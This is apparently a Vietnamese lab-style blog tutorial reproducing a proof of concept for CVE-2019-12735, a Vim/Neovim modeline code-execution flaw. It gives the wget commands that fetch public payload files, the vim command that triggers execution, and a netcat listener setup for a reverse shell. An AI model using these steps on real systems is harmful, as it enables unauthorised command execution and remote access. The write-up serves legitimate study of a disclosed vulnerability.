CVE-2019-12735

Exploit PoC: Linux command execution on Vim/Neovim vulnerability (CVE-2019–12735)

Vim ở phiên bản trước 8.1.1365 và Neevim trước phiên bản 0.3.6 dễ thực thi code execution thông qua modelines bằng cách mở các file text đặt biệt được tạo ra.

Chi tiết đọc thêm ở đây

Môi trường:

vim 7.4

[root@sky ~]# vim --version 
VIM - Vi IMproved 7.4 (2013 Aug 10, compiled Oct 30 2018 19:56:57)
Included patches: 1-160, 399, 402-403, 1099
Modified by <bugzilla@redhat.com>
Compiled by <bugzilla@redhat.com>

Thực hiện

 • POC1: Thực hiện uname -a khi sử dụng vim somthing_file

  • Tạo ra một file có nội dung sau

   wget https://raw.githubusercontent.com/numirias/security/master/data/2019-06-04_ace-vim-neovim/poc.txt

  • Thực hiện POC

   vim -c ":so! poc.txt"
  
  • Kết quả
   [root@sky ~]# vim -c ":so! poc.txt"
  
   Linux sky 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
  
   Press ENTER or type command to continue
  
 • POC2: Thực hiện reverse shell

  • Tạo ra một file có nội dung như sau

   wget https://raw.githubusercontent.com/numirias/security/master/data/2019-06-04_ace-vim-neovim/shell.txt

  • Tham khảo thêm về kỹ thuật reverse shell tại đây

  • Chia 2 cửa số terminal

   • terminal 1: Thực hiện nc -lvp 9999
   • terminal 2: Thực hiên vim -c ":so! /root/shell.txt"
  • Kết quả:

   • Trước khi thực hiện lệnh vim

   • Sau khi thực hiện lệnh vim

Tài liệu tham khảo

 • https://github.com/numirias/security
Written by Nguyễn Văn Minh
×

Subscribe

The latest tutorials sent straight to your inbox.